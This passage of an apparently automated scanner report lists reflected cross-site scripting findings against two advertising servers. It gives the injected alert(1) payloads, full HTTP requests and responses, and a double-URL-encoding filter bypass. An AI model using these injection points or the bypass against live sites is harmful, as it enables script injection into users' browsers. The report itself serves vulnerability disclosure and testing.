Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:48:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6365

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
792905/1-11HI_COLORIZER_BACKUP_300x250.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!9990f"-alert(1)-"68474f31a2a&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/h%3B231983801%3B0-0%3B0%3B5559877
...[SNIP]...

5.46. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f03d'-alert(1)-'e1b575eb0ff was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!5f03d'-alert(1)-'e1b575eb0ff&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:48:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6239

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!5f03d'-alert(1)-'e1b575eb0ff&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/x%3B231464651%3B0-0%3B0%3B5559877
...[SNIP]...

5.47. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4492.MSN/B5014254.31

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4546'-alert(1)-'157905325f3 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875d4546'-alert(1)-'157905325f3&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:49:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 597

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875d4546'-alert(1)-'157905325f3&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/db/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175
...[SNIP]...

5.48. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4492.MSN/B5014254.31

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc5d7'-alert(1)-'b7357488df1 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972dc5d7'-alert(1)-'b7357488df1&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 597

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972dc5d7'-alert(1)-'b7357488df1&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/db/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;;~sscs=%3fhttp://www.progressiv
...[SNIP]...

5.49. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4492.MSN/B5014254.31

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9da96'-alert(1)-'4611c74e57a was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab9da96'-alert(1)-'4611c74e57a&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 597

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab9da96'-alert(1)-'4611c74e57a&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/db/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;;~sscs=%3fhttp://www.progressive.com/insurance/nyp/display.aspx?&code=990360023
...[SNIP]...

5.50. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4492.MSN/B5014254.31

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14656'-alert(1)-'cde54af0bc was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC414656'-alert(1)-'cde54af0bc&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 596

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC414656'-alert(1)-'cde54af0bc&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/da/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;;~sscs=%3fhttp://www.progressive.com/insu
...[SNIP]...

5.51. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4492.MSN/B5014254.31

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36039'-alert(1)-'7c5b64ad2e1 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=2825348936039'-alert(1)-'7c5b64ad2e1&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:49:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 597

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=2825348936039'-alert(1)-'7c5b64ad2e1&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/db/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;;~sscs=%3fhttp://w
...[SNIP]...

5.52. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4492.MSN/B5014254.31

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e1c6'-alert(1)-'e0a8cb864a0 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G9e1c6'-alert(1)-'e0a8cb864a0&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:49:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 597

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G9e1c6'-alert(1)-'e0a8cb864a0&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/db/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;
...[SNIP]...

5.53. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4492.MSN/B5014254.31

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2757'-alert(1)-'bc021de3ac was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=d2757'-alert(1)-'bc021de3ac HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 596
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:50:37 GMT
Expires: Sun, 30 Jan 2011 14:50:37 GMT

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=d2757'-alert(1)-'bc021de3achttp://ad.doubleclick.net/click;h=v8/3a9f/14/da/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;;~sscs=%3fhttp://www.progressive.com/insurance/nyp/display.aspx?&code=9903600230&utm_medium=
...[SNIP]...

5.54. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4492.MSN/B5014254.31

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72964'-alert(1)-'300a0130d45 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!72964'-alert(1)-'300a0130d45&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:48:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 597

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!72964'-alert(1)-'300a0130d45&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/db/%2a/l;233815726;0-0;0;57696442;91-300/60;3
...[SNIP]...

5.55. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 482d2%2522%253balert%25281%2529%252f%252f363cbcfa118 was submitted in the REST URL parameter 2. This input was echoed as 482d2";alert(1)//363cbcfa118 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260482d2%2522%253balert%25281%2529%252f%252f363cbcfa118/45.0.js.300x250/1296350884** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1593

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260482d2";alert(1)//363cbcfa118/45.0.js.300x250/1296353117**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.56. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 117bb%2522%253balert%25281%2529%252f%252f9c0f430c402 was submitted in the REST URL parameter 3. This input was echoed as 117bb";alert(1)//9c0f430c402 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250117bb%2522%253balert%25281%2529%252f%252f9c0f430c402/1296350884** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1593

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250117bb";alert(1)//9c0f430c402/1296353119**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.57. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d1e%2522%253balert%25281%2529%252f%252f09059928b was submitted in the REST URL parameter 2. This input was echoed as b7d1e";alert(1)//09059928b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260b7d1e%2522%253balert%25281%2529%252f%252f09059928b/45.0.js.300x250/Insert_Random_Number?click=Insert_Click_Track_URL HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1525

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260b7d1e";alert(1)//09059928b/45.0.js.300x250/1296351640**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.58. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf329%2522%253balert%25281%2529%252f%252f8550b302086 was submitted in the REST URL parameter 3. This input was echoed as bf329";alert(1)//8550b302086 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250bf329%2522%253balert%25281%2529%252f%252f8550b302086/Insert_Random_Number?click=Insert_Click_Track_URL HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1527

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
